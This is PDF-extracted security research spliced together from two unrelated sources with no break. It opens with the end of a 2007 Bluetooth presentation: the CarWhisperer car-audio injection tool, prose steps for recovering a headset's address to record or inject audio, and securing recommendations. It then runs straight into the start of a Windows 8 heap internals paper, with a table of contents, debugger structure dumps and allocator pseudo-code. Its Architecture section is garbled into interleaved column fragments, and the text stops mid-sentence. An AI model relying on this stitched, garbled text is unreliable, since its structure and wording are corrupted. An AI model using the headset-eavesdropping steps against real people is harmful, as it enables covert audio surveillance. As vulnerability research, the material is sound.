– Often in discoverable mode by default
• Play or record audio through car speakers, 
attacks weak PIN selection
"This is the 
police, stop speeding"
 
 
CarWhisperer 
 
Many cars are shipping with Bluetooth tec hnology built-in, often with the Bluetooth 
stack in discoverable mode by default with a simple, static PIN such as 1234 or 0000.  
The CarWhisperer tool was designed to dem onstrate weaknesses in automotive Bluetooth 
installations, automating the process of conn ecting to an automobile's Bluetooth stack 
and playing selected audio files th rough the car's stereo speakers. 
In testing this tool, the Trifinite group, a worldwide group of Bluetooth security 
researchers, found a long stretch of highw ay and a bridge overlooking the highway.  
Positioned on the bridge with a laptop runni ng CarWhisperer and a high-gain directional 
antenna, the Trifinite group was able to connect to vulnerabl e Bluetooth stacks, and play 
an audio message in the car, helpfully inform ing the drivers that th eir car was vulnerable 
to Bluetooth attacks. 
A limitation of the CarWhisperer is that is wa s only able to target devices who were in 
discoverable mode.  Bluet ooth hands-free systems deployed in cars that disable 
discoverable mode have not been vulnerabl e to the CarWhisperer attack, unless the 
BD_ADDR of the device was known thr ough some other discovery mechanism. 
 
Slide 31 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightCapturing and Recording Audio
1. Enumerate the LAP of the piconet 
master with USRP/gr-bluetooth
2. Wait for headset to end call
3. Use BNAP database of Bluetooth 
OUI’s to enumerate remaining 
BD_ADDR bytes
4. Connect to headset directly with 
CarWhisperer, inject and record audio
 
 
Capturing and Recording Audio 
 
Out attack develops as follows: 
 Identify the presence of Blue tooth traffic using the USRP wi th the gr-bluetooth package.  
Capture the sync word data to enum erate the LAP of the piconet master. 
Wait for the headset to the end the call. Use a modified version of BTScanner to enumerate the remaining BD_ADDR bytes.  
Instead of brute-forcing the entire unknown 24-bit range, leverage the known Bluetooth 
OUI’s from the BNAP, BNAP project to identify the full BD_ADDR. Connect to the headset directly using the CarWhisperer tool, in jecting and recording 
audio information.  
Slide 32 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightPractical Recommendations for 
Securing Bluetooth
 
 
Practical Recommendations for Securing Bluetooth  
Now that we've examined different attacks and vulnerabilities affecting Bluetooth 
networks, let's examine some practical  advice for securing these networks. 
 
Slide 33 
 
Hidden Risks of Bluetooth – © 2007 Joshua Wright“The Good Old Days”
 
 
This page left intentionally blank.  
Slide 34 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightEstablishing a Policy
• Start with a list of acceptable Bluetooth 
devices
– Headsets, authorized mobile phones
• Reference policy on sensitive information 
storage
• Bluetooth use in a hostile environment
• Requirements for PIN selection, rotation• Educate users to risks of unsolicited 
connection requests
• Encourage pairing in a secure location
 
 
Establishing a Policy 
 
A security policy for your organization with  regard to the use and deployment of 
Bluetooth technology is an excel lent, low-cost first step in addressing the issues.  
Bluetooth policies should cover the following areas: 
 Acceptable Bluetooth devices: Identify a lis t of acceptable Bluetooth devices in your 
organization.  Most organizations who wish to allow the use of Bluetooth technology will 
want to allow the use of headsets and Blue tooth-enabled phones, but may wish to forbid 
the use of Bluetooth on desktop and laptop syst ems where sensitive information is stored.  
Other organizations may wish to establish a "N o Bluetooth" policy for strict controls on 
this ad-hoc technology. Reference your policy on sensitive informati on storage: Some employees may be storing 
sensitive information on mobile Bluetooth de vices, such as phones, PDA's and other 
devices.  It is important to reference any existing policies on where sensitive information 
can be stored (for example, can confidential information be stored on USB drives that are easily lost or stolen?), requi ring any Bluetooth devices to abide by this policy as well. 
Identify how Bluetooth can be used in a hos tile environment:  Some organizations may 
wish to forbid the use of Bluetooth tec hnology in hostile environments, such as trade 
shows, since they may be at greater  risk to any number of attacks. 
Requirements for PIN selection:  What is the minimum PIN length that is required for 
Bluetooth devices?  This length should be ba sed on a reasonable amount of time that an 
adversary may be within range of an victim to implement an attack.  For example, a 10-
character PIN can be brute-forced with BTCr ack in less than 14 hours, with probability 
on the side of the attacker, assume less than 7 hours.  If this is a reasonable amount of 
time for exposure to an attacker, then an 10-character PIN may be acceptable for your environment.  The PIN selection does not ad equately defend against a targeted attack 
where the adversary may crack the PIN and then return to exploit the victim, so it is moot 
to force a longer PIN selection.  Also cons ider a PIN rotation policy, requiring that 
Bluetooth users change their PI Ns at specified intervals. 
Educate users to risks of unsolicited connect ion requests: Advise users not to accept 
unsolicited connection request s on their Bluetooth devices , as this may open up an 
opportunity for the attacker to exploit the target device. 
Encourage pairing in a secure location: Du ring the pairing Bluetooth devices is when 
they are most vulnerable to attack.  Advise users not to pair Bluetooth devices is open 
public areas (such as coffee shops) or ot her potentially hostile environments. 
 
Slide 35 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightWhat is a "Secure Location"
• Reasonably free from eavesdropping 
attacks
Look, it 
floats
Faraday 
Cage
 
 
This page intentionally left blank  
Slide 36 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightBluetooth SIG 2.1 Simple Pairing
• Recent update to the Bluetooth 
specification
– Includes “Secure Simple Pairing”
enhancements to security
• Cryptography application is improved 
significantly beyond PIN
• Potential weakness in “Just Works”
mechanism
– No verification with initial DH key exchange
 
 
Bluetooth SIG 2.1 Simple Pairing  
In June 2007, the Bluetooth Special Inte rest Group ratified the Bluetooth 2.1 
specification, which introduced several enhanc ements to the Bluetooth security model.  
Replacing the PIN and link key derivation authentication exchange are several 
authentication options, each suitable to a different class of device. 
For Bluetooth headsets without display capab ilities, the “Just Wo rks” authentication 
exchange is used. Since there is no ability to display on the headset, and limited user 
input (e.g. one button that can be used for yes or no responses), the initial pairing 
between devices is automatic, assuming the remote  entity is legitimate.  Despite the fact 
that the headsets use Diffie Hellman (DH) ke y exchange, the lack of verification here 
could allow an attacker to connect to the head set in an unauthenticated fashion, similar to 
the attack described in this  presentation.  As there are no known Bluetooth 2.1 adapters 
shipping yet, the potential weakness described here is still untested. 
 
Slide 37 
 
Hidden Risks of Bluetooth – © 2007 Joshua WrightSummary
• Devices often rely on “non-discoverable 
mode” for authorization
– Subverted with SDR, LAP in sync word
• Decrypting in-call traffic still a challenge 
unless link key is known
• Can connect to headsets when not in a 
call to record/inject arbitrary audio
 
 
Summary  
In this module, we've examined the Blue tooth specification a nd the capabilities and 
features of Bluetooth devices including the layered stack model, three classes of devices 
with varying transmit capabilities, and th ree security models.  Understanding how 
Bluetooth operates is necessary for understa nding that vulnerabilities exist in both the 
implementation of Bluetooth stacks, and in  the design of the protocol as well. 
 
Many Bluetooth devices with limited form-fact ors are unable to change the default PIN 
value, relying on the non-discove rable mode feature as an aut horization mechanism.  This 
is not a strong authorization approach however, as 24-bits of the BD_ADDR can be retrieved from the sync word in a single frame.  While decrypting traffic during a call is still a challenge due to the use of a 128-bit link key used for encryption, it is possible to connect to another headset directly once the BD_ADDR is known, and the device is no longer in an active call.  This allows the 
headset to be used as a remote audio bug de vice, and potentially greater mischief with 
audio playback.  I hope you enjoyed this session on my adventur e in exploiting a Bluetooth headset.  I 
welcome any comments or questions on th is material.  Please contact me at 
jwright@willhackforsushi.com.    W
	
		
Chris	ValSr.	Secur
i
cvalasek@
@nudeha
Wind
asek	 	
ity	Research	
@gmail.com 	
aberdasher	
dow
		
Scientist	–	 C
				
ws	8	H
Coverity
	
	
Hea
	T a r j
	S r . 	 V
	kern
	@ k e
p	In
ei	Mandt	
Vulnerabilit y
nelpool@gm a
ernelpool	
1 | Windo wntern
y	Researcher	
ail.com	
ws 8 Heap Intenals
–	Azimuth	
ernals 	
2 | Windows  8 Heap Internals 
 Contents 	
Introduction  ............................................................................................................................... ...................  4 
Overview  ............................................................................................................................... ........................  4 
Prior Works ............................................................................................................................... ....................  5 
Prerequisites  ............................................................................................................................... ..................  5 
User Land ............................................................................................................................... ...................  5 
Kernel Land ............................................................................................................................... ................  5 
Terminology  ............................................................................................................................... ...................  6 
User Land Heap Manager .............................................................................................................................  7 
Data Structures  ............................................................................................................................... .......... 7 
_HEAP (HeapBase)  ............................................................................................................................... . 7 
_LFH_HEAP  (Heap‐>FrontEndHeap)  .....................................................................................................  8 
_HEAP_LOCAL_DATA  (Heap‐>FrontEndHeap ‐>LocalData)  ...................................................................  9 
_HEAP_LOCAL_SEGMENT_INFO  (Heap‐>LFH‐>SegmentInfoArrays[]  / AffinitizedInfoArrays[])  .......... 9 
_HEAP_SUBSEGMENT  (Heap‐>LFH‐>InfoArrays[] ‐>ActiveSubsegment)  ............................................  10 
_HEAP_USERDATA_HEADER  (Heap‐>LFH‐>InfoArrays[] ‐>ActiveSubsegment ‐>UserBlocks)  ............. 11 
_RTL_BITMAP  (Heap‐>LFH‐>InfoArrays[] ‐>ActiveSubsegment ‐>UserBlocks ‐>Bitmap) .....................  12 
_HEAP_ENTRY  ............................................................................................................................... ...... 12 
Architecture  ............................................................................................................................... ............. 13 
Algorithms  ‐‐ Allocation  ..........................................................................................................................  15 
Intermediate  ............................................................................................................................... ........ 15 
BackEnd ............................................................................................................................... ................  18 
Front End ............................................................................................................................... .............. 25 
Algorithms  – Freeing ...............................................................................................................................  37 
Intermediate  ............................................................................................................................... ........ 37 
BackEnd ............................................................................................................................... ................  40 
FrontEnd ............................................................................................................................... ...............  44 
Security Mechanisms  ..............................................................................................................................  47 
_HEAP Handle Protection  ...................................................................................................................  47 
Virtual Memory Randomization  ..........................................................................................................  48 
FrontEnd Activation  ............................................................................................................................  49 
FrontEnd Allocation  ............................................................................................................................  50 
3 | Windows  8 Heap Internals 
 Fast Fail ............................................................................................................................... ................  52 
Guard Pages ............................................................................................................................... ......... 53 
Arbitrary Free ............................................................................................................................... ....... 56 
Exception  Handling .............................................................................................................................  57 
Exploitation  Tactics ............................................................................................................................... .. 58 
Bitmap Flipping 2.0 .............................................................................................................................  58 
_HEAP_USERDATA_HEADER  Attack ....................................................................................................  60 
User Land Conclusion  ..............................................................................................................................  62 
Kernel Pool Allocator ............................................................................................................................... ... 63 
Fundamentals  ............................................................................................................................... .......... 63 
Pool Types ............................................................................................................................... ............ 63 
Pool Descriptor  ............................................................................................................................... .... 63 
Pool Header ............................................................................................................................... .......... 64 
Windows  8 Enhancements  .....................................................................................................................  66 
Non‐Executable  (NX) Non‐Paged Pool ................................................................................................  66 
Kernel Pool Cookie ..............................................................................................................................  69 
Attack Mitigations  ............................................................................................................................... .... 75 
Process Pointer Encoding ....................................................................................................................  75 
Lookaside  Cookie ............................................................................................................................... . 76 
Cache Aligned Allocation  Cookie ........................................................................................................  77 
Safe (Un)linking  ............................................................................................................................... .... 78 
PoolIndex  Validation  ...........................................................................................................................  79 
Summary  ............................................................................................................................... .............. 80 
Block Size Attacks ............................................................................................................................... ..... 82 
Block Size Attack ............................................................................................................................... .. 82 
Split Fragment  Attack ..........................................................................................................................  83 
Kernel Land Conclusion  ...........................................................................................................................  85 
Thanks ............................................................................................................................... ..........................  85 
Bibliography  ............................................................................................................................... .................  86 
 
  
4 | Windows  8 Heap Internals 
 Introduction 	
 
Windows  8 developer  preview was released in September  2011. While many focused on the Metro UI of 
the operating  system, we decided to investigate  the memory manager.  Even though generic heap 
exploitation  has been dead for quite some time, intricate knowledge  of both the application  and 
underlying  operating  system's memory manager have permitted  reliable heap exploitation  occur under 
certain circumstances.  This paper focuses on the transition  of heap exploitation  mitigations  from 
Windows  7 to Windows  8 (Release Preview) from both a user‐land and kernel‐land perspective.  We will 
be examining  the inner workings of the Windows  memory manager for allocations,  de‐allocations  and all 
additional  heap‐related security features implemented  in Windows  8. Also, additional  tips and tricks will 
be covered providing  the readers the proper knowledge  to achieve the highest possible levels of heap 
determinism.   
Overview 	
This paper is broken into two major sections, each having several subsections.  The first major section of 
the paper covers the User Land Heap Manager , which is default mechanism  for applications  that 
implementing  dynamic memory (i.e. heap memory).  The first subsection  will give an overview of 
changes in the Data Structures  used by the Windows  8 heap manager when tracking memory used by 
applications,  followed by a brief update regarding  an update to the overall heap manager Architecture . 
The second subsection  will cover key Algorithms  that direct the manager on how to allocate and free 
memory. The third subsection  will unveil information  about Security Mitigations  that are new to the 
Windows  8 operating  system, providing  better overall protection  for dynamically  allocated memory. The 
fourth and final subsection  will divulge information  regarding  Exploitation  Tactics . Although few, still 
are valid against the Windows  8 Release Preview. Lastly, a conclusion  will be formed about the overall 
state of the User Land Heap Manager.   
The second major section will detail the inner workings of the Windows  8 Kernel Pool Allocator . In the 
first subsection,  we briefly introduce  the Kernel Pool , its lists and structures.  The second subsection  
highlights  the new major Security Improvements  featured in the Windows  8 kernel pool, such as the 
non‐executable  non‐paged pool and the kernel pool cookie. In the third subsection,  we look at how 
Prior Attacks applicable  to Windows  7 are mitigated  in Windows  8 with the help of these improvements  
as well as by introducing  more stringent security checks. In subsection  four, we discuss some alternative  
approaches  for Attacking  the Windows  8 kernel pool, while still focusing on pool header attacks. Finally, 
in subsection  five, we offer a conclusion  of the overall state of the Kernel Pool. 
  
5 | Windows  8 Heap Internals 
 Prior	Works	
Although the content within this document  is completely  original, it is based on a foundation  of prior 
knowledge.  The follow list contains some works that are recommended  reading before fully divulging 
into this paper:  
 While some of the algorithms  and data structures  have changed for the Heap Manager , the 
underlying  foundation  is very similar to the Windows  7 Heap Manager (Valasek 2010) 
 Again, the vast majority of changes to the Kernel Pool were derived from the Windows  7 Kernel 
Pool which should be understood  before digesting the follow material (Mandt 2011) 
 Lionel d’Hauenens  (http://www.laboskopia.com)  Symbol Type Viewer was an invaluable  tool 
when analyzing  the data structures  used by the Windows  8 heap manager.  Without it many 
hours might have been wasted looking for the proper structures.  
Prerequisites 	
User	Land	
All of the pseudo‐code and data structures  were acquired via the 32‐bit version of Windows  8 Release 
Preview from ntdll.dll (6.2.8400.0) , which is the most recent version of the binary. Obviously,  the code 
and data is limited to a 32‐bit architecture  but may have relevance  to the 64‐bit architecture  as well.  
If you have any questions,  comments,  or feel that any of the information  regarding  the Heap Manager is 
incorrect,  please feel free to contact Chris at cvalasek@gmail.com .  
Kernel	Land	
All of the pseudo‐code and data structures  were acquired via the 64‐bit version of Windows  8 Release 
Preview from ntoskrnl.exe  (6.2.8400.0 ). However,  both 32‐ and 64‐bit versions have been studied in 
order to identify differences  in how mitigations  have been implemented.  This is mentioned  explicitly 
where applicable.  
If you have any questions,  comments,  or feel that any of the information  regarding  the Kernel Pool is 
incorrect,  please feel free to contact Tarjei at kernelpool@gmail.com . 
  	
6 | Windows  8 Heap Internals 
 Terminology 		
Just like previous papers, this section is included to avoid any ambiguity  with regards to terms used to 
describe objects and function of the Windows  8 heap. While the terms may not be universally  agreed 
upon, they will be consistently  used throughout  this paper.  
The term block or blocks will refer to 8‐bytes or 16‐bytes of contiguous  memory for 32‐bit and 64‐bit 
architectures,  respectively.  This is the unit measurement  used by heap chunk headers when referencing  
their size. A chunk is a contiguous  piece of memory that can be measured  in either blocks or bytes. 
A chunk header or heap chunk header is synonymous  with a _HEAP_ENTRY  structure and can be 
interchangeably  used with the term header .  
A _HEAP_LIST_LOOKUP  structure is used to keep track of free chunk based on their size and will be 
called a BlocksIndex  or a ListLookup .  
A FreeList is a doubly linked list that is a member of the HeapBase  structure that has a head pointing to 
the smallest chunk in the list and gets progressively  larger until pointing back to itself to denote list 
termination.  ListHints , on the other hand, point into the FreeLists at specific locations as an optimization  
when searching  for chunks of a certain size.  
The term UserBlocks  or UserBlock  container  is used to describe the collection  of individual  chunks that 
are preceded  by a _HEAP_USERDATA_HEADER.  These individual  chunks are the memory that the Low 
Fragmentation  Heap (LFH) returns to the calling function. The chunks in the UserBlocks  are grouped by 
size, or put into HeapBuckets  or Buckets . 
Lastly, the term Bitmap will be used to describe a contiguous  piece of memory where each bit 
represents  a state, such as free or busy . 
 
  	
7 | Windows  8 Heap Internals 
 User	Land	Heap	Manager 	
This section examines  the inner workings of Windows  8 Heap Manager by detailing the data structures,  
algorithms,  and security mechanisms  that are integral to its operation.  The content is not meant to be 
completely  exhaustive,  but only to provide insight into the most important  concepts applicable  to 
Windows  8 Release Preview.  
Data	Structures 	
The following  data structures  come from Windows  8 Release Preview via Windbg with an ntdll.dll 
having a version of 6.2.8400.0 . These structures  are used to keep track and manage free and allocated 
memory when an application  calls functions  such as free(), malloc(), and realloc().  
_HEAP	
(HeapBase) 	
A heap structure is created for each process (default process heap) and can also be created ad hoc via 
the HeapCreate()  API. It serves as the main infrastructure  for all items related to dynamic memory, 
containing  other structures,  pointers, and data used by the Heap Manager to properly allocate and de‐
allocate memory.  
For a full listing please issue the dt _HEAP command  in Windbg.  
0:030> dt _HEAP 
ntdll!_HEAP  
+0x000 Entry             : _HEAP_ENTRY  
... 
+0x018 Heap              : Ptr32 _HEAP 
... 
+0x04c EncodeFlagMask    : Uint4B 
+0x050 Encoding          : _HEAP_ENTRY  
+0x058 Interceptor       : Uint4B 
... 
+0x0b4 BlocksIndex       : Ptr32 Void 
... 
+0x0c0 FreeLists         : _LIST_ENTRY  
+0x0c8 LockVariable      : Ptr32 _HEAP_LOCK  
+0x0cc CommitRoutine     : Ptr32     long 
+0x0d0 FrontEndHeap      : Ptr32 Void 
... 
+0x0d8 FrontEndHeapUsageData  : Ptr32 Uint2B 
+0x0dc FrontEndHeapMaximumIndex  : Uint2B 
+0x0de FrontEndHeapStatusBitmap  : [257] UChar 
+0x1e0 Counters          : _HEAP_COUNTERS  
+0x23c TuningParameters  : _HEAP_TUNING_PARAMETERS  
 
 FrontEndHeap  – A pointer to a structure that is the FrontEnd Heap. In Windows  8 case, the Low 
Fragmentation  Heap (LFH) is the only option available.   
8 | Windows  8 Heap Internals 
  FrontEndHeapUsageData  – Is an array of 128 16‐bit integers that represent  a counter or 
HeapBucket  index. The counter denotes how many allocations  of a certain size have been seen, 
being incremented  on allocation  and decremented  on de‐allocation.  The HeapBucket  index is 
used by the FrontEnd Heap to determine  which _HEAP_BUCKET  will service a request. It is 
updated by the BackEnd manager during allocations  and frees to heuristically  enable the LFH for 
a certain size. Windows  7 previously  stored these values in the ListHint[Size] ‐>Blink variable 
within the BlocksIndex .  
 FrontEndHeapStatusBitmap  – A bitmap used as an optimization  when determining  if a memory 
request should be serviced by the BackEnd or FrontEnd heap. If the bit is set then the LFH 
(FrontEnd)  will service the request, otherwise  the BackEnd (linked list based heap) will be 
responsible  for the allocation.  It is updated by the BackEnd manager during allocations  and frees 
to heuristically  enable the LFH for specific sizes.  
_LFH_HEAP 	
(Heap‐>FrontEndHeap) 	
The _LFH_HEAP  structure hasn’t changed much since the Windows  7 days, only now there are separate 
arrays for regular InfoArrays  and Affinitized  InfoArrays.  This means, unlike Windows  7, which used the 
LocalData  member to access the proper _HEAP_LOCAL_SEGMENT_INFO  structure based on Processor  
Affinity , Windows  8 has separate variables.   
0:030> dt _LFH_HEAP  
ntdll!_LFH_HEAP  
   +0x000 Lock              : _RTL_SRWLOCK  
   +0x004 SubSegmentZones   : _LIST_ENTRY  
   +0x00c Heap              : Ptr32 Void 
   +0x010 NextSegmentInfoArrayAddress  : Ptr32 Void 
   +0x014 FirstUncommittedAddress  : Ptr32 Void 
   +0x018 ReservedAddressLimit  : Ptr32 Void 
   +0x01c SegmentCreate     : Uint4B 
   +0x020 SegmentDelete     : Uint4B 
   +0x024 MinimumCacheDepth  : Uint4B 
   +0x028 CacheShiftThreshold  : Uint4B 
   +0x02c SizeInCache       : Uint4B 
   +0x030 RunInfo           : _HEAP_BUCKET_RUN_INFO  
   +0x038 UserBlockCache    : [12] _USER_MEMORY_CACHE_ENTRY  
   +0x1b8 Buckets           : [129] _HEAP_BUCKET  
   +0x3bc SegmentInfoArrays  : [129] Ptr32 _HEAP_LOCAL_SEGMENT_INFO  
   +0x5c0 AffinitizedInfoArrays  : [129] Ptr32 _HEAP_LOCAL_SEGMENT_INFO  
   +0x7c8 LocalData          : [1] _HEAP_LOCAL_DATA  
 
 SegmentInfoArrays  – This array is used when there is no affinity associated  with a specific 
HeapBucket  (i.e. size).  
 AffinitizedInfoArrays  – This array is used when a specific processor  or core is deemed 
responsible  for certain allocations.  See SMP (SMP) for more information.   
9 | Windows  8 Heap Internals 
 _HEAP_LOCAL_DATA 	
(Heap‐>FrontEndHeap ‐>LocalData) 	
The only thing to notice is that due to how Affinitized  and LocalInfo arrays are handled by the LFH, the 
_HEAP_LOCAL_DATA  structure no longer needs to have a _HEAP_LOCAL_SEGMENT_INFO  array 
member.  
0:001> dt _HEAP_LOCAL_DATA  
ntdll!_HEAP_LOCAL_DATA  
   +0x000 DeletedSubSegments  : _SLIST_HEADER  
   +0x008 CrtZone           : Ptr32 _LFH_BLOCK_ZONE  
   +0x00c LowFragHeap       : Ptr32 _LFH_HEAP  
   +0x010 Sequence           : Uint4B 
   +0x014 DeleteRateThreshold  : Uint4B 
 
_HEAP_LOCAL_SEGMENT_INFO 	
(Heap‐>LFH‐>SegmentInfoArrays[] 	/	AffinitizedInfoArrays[]) 	
The structure has changed a bit since Windows  7. It no longer contains the Hint _HEAP_SUBSEGMENT  
structure as it is no longer used for allocations.  Other than the removal of the Hint, the only changes are 
the order of the members.   
0:001> dt _HEAP_LOCAL_SEGMENT_INFO  
ntdll!_HEAP_LOCAL_SEGMENT_INFO  
   +0x000 LocalData          : Ptr32 _HEAP_LOCAL_DATA  
   +0x004 ActiveSubsegment  : Ptr32 _HEAP_SUBSEGMENT  
   +0x008 CachedItems       : [16] Ptr32 _HEAP_SUBSEGMENT  
   +0x048 SListHeader       : _SLIST_HEADER  
   +0x050 Counters          : _HEAP_BUCKET_COUNTERS  
   +0x058 LastOpSequence    : Uint4B 
   +0x05c BucketIndex       : Uint2B 
   +0x05e LastUsed          : Uint2B 
   +0x060 NoThrashCount     : Uint2B 
 
 ActiveSubsegment  – As you can see there is now only one _HEAP_SUBSEGMENT  in the LocalInfo 
structure.  The Hint Subsegment  is no longer used.  
  	
10 | Windows  8 Heap Internals 
 _HEAP_SUBSEGMENT 	
(Heap‐>LFH‐>InfoArrays[] ‐>ActiveSubsegment) 	
The _HEAP_SUBSEGMENT  structure has only minor changes that add a singly linked list used to track 
chunks that could not be freed at the designated  time.  
0:001> dt _HEAP_SUBSEGMENT  
ntdll!_HEAP_SUBSEGMENT  
   +0x000 LocalInfo         : Ptr32 _HEAP_LOCAL_SEGMENT_INFO  
   +0x004 UserBlocks        : Ptr32 _HEAP_USERDATA_HEADER  
   +0x008 DelayFreeList     : _SLIST_HEADER  
   +0x010 AggregateExchg    : _INTERLOCK_SEQ  
   +0x014 BlockSize          : Uint2B 
   +0x016 Flags             : Uint2B 
   +0x018 BlockCount        : Uint2B 
   +0x01a SizeIndex          : UChar 
   +0x01b AffinityIndex     : UChar 
   +0x014 Alignment          : [2] Uint4B 
   +0x01c SFreeListEntry    : _SINGLE_LIST_ENTRY  
   +0x020 Lock              : Uint4B  
 
 DelayFreeList  – This singly linked list is used to store the addresses  of chunks that could not be 
freed at their desired time. The next time RtlFreeHeap  is called, the de‐allocator will attempt to 
traverse the list and free the chunks if possible. 
  	
11 | Windows  8 Heap Internals 
 _HEAP_USERDATA_HEADER 	
(Heap‐>LFH‐>InfoArrays[] ‐>ActiveSubsegment ‐>UserBlocks) 	
This data structure has gone through the biggest transformation  since Windows  7. Changes were made 
so the heap manager would not have to blindly rely in information  that could have been corrupted.  It 
also takes into account adding guard pages for extra protection  when allocating  a UserBlock  container.   
0:001> dt _HEAP_USERDATA_HEADER  
ntdll!_HEAP_USERDATA_HEADER  
   +0x000 SFreeListEntry    : _SINGLE_LIST_ENTRY  
   +0x000 SubSegment        : Ptr32 _HEAP_SUBSEGMENT  
   +0x004 Reserved           : Ptr32 Void 
   +0x008 SizeIndexAndPadding  : Uint4B 
   +0x008 SizeIndex          : UChar 
   +0x009 GuardPagePresent  : UChar 
   +0x00a PaddingBytes      : Uint2B 
   +0x00c Signature          : Uint4B 
   +0x010 FirstAllocationOffset  : Uint2B 
   +0x012 BlockStride       : Uint2B 
   +0x014 BusyBitmap        : _RTL_BITMAP  
   +0x01c BitmapData        : [1] Uint4B 
 
 GuardPagePresent  – If this flag is set then the initial allocation  for the UserBlocks  will contain a 
guard page at the end. This prevents sequential  overflows  from accessing  adjacent memory.  
 FirstAllocationOffset  – This SHORT is very similar to the implied initial value of 0x2 on Windows  
7. Now the value is set explicitly to the first allocable chunk in the UserBlocks  
 BlockStride  – A value to denote the size of each chunk (which are all the same size) contained  by 
the UserBlocks.  Previously,  this value was derived from the FreeEntryOffset .  
 BusyBitmap  – A contiguous  piece of memory that contains a bitmap denoting which chunks in a 
UserBlock  container  are FREE or BUSY. In Windows  7, this was accomplished  via the 
FreeEntryOffset  and the _INTERLOCK_SEQ.Hint  variables.   
  	
12 | Windows  8 Heap Internals 
 _RTL_BITMAP 	
(Heap‐>LFH‐>InfoArrays[] ‐>ActiveSubsegment ‐>UserBlocks ‐>Bitmap) 	
This small data structure is used to determine  which chunks (and their associated  indexes in the 
UserBlocks)  are FREE or BUSY for a parent UserBlock  container.   
0:001> dt _RTL_BITMAP  
ntdll!_RTL_BITMAP  
   +0x000 SizeOfBitMap      : Uint4B 
   +0x004 Buffer            : Ptr32 Uint4B 
 
 SizeOfBitMap  – The size, in bytes, of the bitmap 
 Buffer – The actual bitmap used in verification  operations  
_HEAP_ENTRY 	
Although the structure of the _HEAP_ENTRY  (aka chunk header or header ) has remained  the same, 
some repurposing  has been done to chunks residing in the LFH.  
0:001> dt _HEAP_ENTRY  
ntdll!_HEAP_ENTRY  
   +0x000 Size              : Uint2B 
   +0x002 Flags             : UChar 
   +0x003 SmallTagIndex     : UChar 
   +0x000 SubSegmentCode    : Ptr32 Void 
   +0x004 PreviousSize      : Uint2B 
   +0x006 SegmentOffset     : UChar 
   +0x006 LFHFlags          : UChar 
   +0x007 UnusedBytes       : UChar 
   +0x000 FunctionIndex     : Uint2B 
   +0x002 ContextValue      : Uint2B 
   +0x000 InterceptorValue  : Uint4B 
   +0x004 UnusedBytesLength  : Uint2B 
   +0x006 EntryOffset       : UChar 
   +0x007 ExtendedBlockSignature  : UChar 
   +0x000 Code1             : Uint4B 
   +0x004 Code2             : Uint2B 
   +0x006 Code3             : UChar 
   +0x007 Code4             : UChar 
   +0x004 Code234           : Uint4B 
   +0x000 AgregateCode      : Uint8B 
 
 PreviousSize  – If the chunk resides in the LFH the PreviousSize  member will contain the index 
into the bitmap used by the UserBlocks , instead of the size of the previous chunk (which makes 
sense, as all chunks within a UserBlock  container  are the same size).  
  
 Archit e
The archi t
removal o
LFH was n
be the ad
linked list
FreeList e
I assume t
be purpo s
_HEAP_B U
the Wind o
_HEAP_B U
optimizat
 
ecture	
tecture of the
of the dual pu
not enabled, t
dress of the _
 structure ser
entry if one ex
this was done
sed for multi p
UCKET struct
ows 8 heap te
UCKET index 
ion for decisi
e Windows  8 
urpose ListHi n
then the valu
_HEAP_BUC K
rved a dual p
xisted. 
e so that a ne
ple tasks. Unf
ure could be 
eam decided 
(instead of th
on making w
 
ListHint and 
nt. Windows  7
e contained  a
KET structure 
urpose for co
ew data struc t
fortunately,  a
overwritten  a
to add dedic
he actual _HE
hen choosin g
FreeList struc
7 uses the Lis
a counter. If t
(plus 1). The 
ounting the nu
ture didn’t ne
as Ben Hawk e
and used to s
ated variabl e
EAP_BUCKET)
g to use the F
ctures are ne
stHint[Size] ‐>
the LFH was e
example belo
umber of allo
eed to be cre
es pointed out
subvert the Fr
es for the allo
), tying them 
rontEnd or Ba
13 | Windo wearly identical
Blink for two
enabled, then
ow shows ho
ocations and p
ated and a _L
t (Hawkes 20
rontEnd alloc
ocation coun t
all together w
ackEnd heap .
ws 8 Heap Intel except for th
o purposes.  If 
n the value wo
w the doubl y
pointing to a 
LIST_ENTRY  c
008), the 
cator. Theref o
t and store th
with a bitma p
.  
ernals he 
the 
ould 
y 
 
could 
ore, 
he 
p 

 You can s
to NULL. A
serviced b
for Ben H
 
ee in the figu
Also, there ha
by the LFH. No
awkes’ _HEA
re below tha
ave been mem
ot only does t
P_BUCKET  ov
 
t the ListHin t
mbers added 
this speed up
verwrite attac
ts no longer c
to the Heap B
p allocation  de
ck (Hawkes 20
contain a cou
Base that trac
ecisions, but 
008).  
14 | Windo wnter in the Bl
ck which chun
it also works 
ws 8 Heap Intelink, which is
nk sizes shou
as a mitigati o
ernals set 
ld be 
on 
 

15 | Windows  8 Heap Internals 
 Algorithms 	‐‐	Allocation 	
This section will go over the allocation  algorithms  used by the Windows  8 Heap Manager.  The first 
subsection  will cover the Intermediate  algorithm  which determines  whether the LFH or the BackHeap  
heap shall service a request. The second subsection  details the BackEnd heap, as it uses heuristics  to 
enable the LFH for chunks based on size. Lastly, the LFH allocation  routine will be described  in detail. 
While the intermediate  and BackEnd algorithms  are very similar to the Windows  7 versions, the 
FrontEnd (LFH) allocator has changed significantly.   
Note: Much of the code has been left out to simplify the learning process. Please contact Chris if more 
in‐depth information  is desired 
Intermediate 	
Before the LFH or the BackEnd heap can be used, certain fields need to be examined  to determine  the 
best course of action. The function that serves this purpose is RtlAllocateHeap.  It has a function 
signature  of:  
void *RtlAllocateHeap(_HEAP  *Heap, DWORD Flags, size_t Size)  
The first thing the function does is some validation  on the amount of memory being requested.  If the 
requested  size is too large (above 2GB on 32‐bit), the call will fail. If the requested  size is too small, the 
minimum  amount of memory is requested.  Then the size is rounded up to the nearest 8‐byte value, as 
all chunks are tracked in Block size, not bytes.  
void *chunk;  
 
//if the size is above 2GB, it won't be serviced  
if(Size > 0x7FFFFFFF)  
  return ERROR_TOO_BIG;  
 
//ensure  that at least 1‐byte will be allocated  
//and subsequently  rounded  (result  ==> 8 byte alloc) 
if(Size == 0) 
  Size = 1; 
 
//ensure  that there will be at least 8 bytes for user data  
//and 8 bytes for the _HEAP_ENTRY  header 
int RoundSize  = (Size + 15) & 0xFFFFFF8;  
 
//blocks  are contiguous  8‐byte chunks 
int BlockSize  = RoundSize  / 8; 
 
  
16 | Windows  8 Heap Internals 
 Next, if the size of the chunk is outside the realm that can be serviced by the LFH (less than 16k), the 
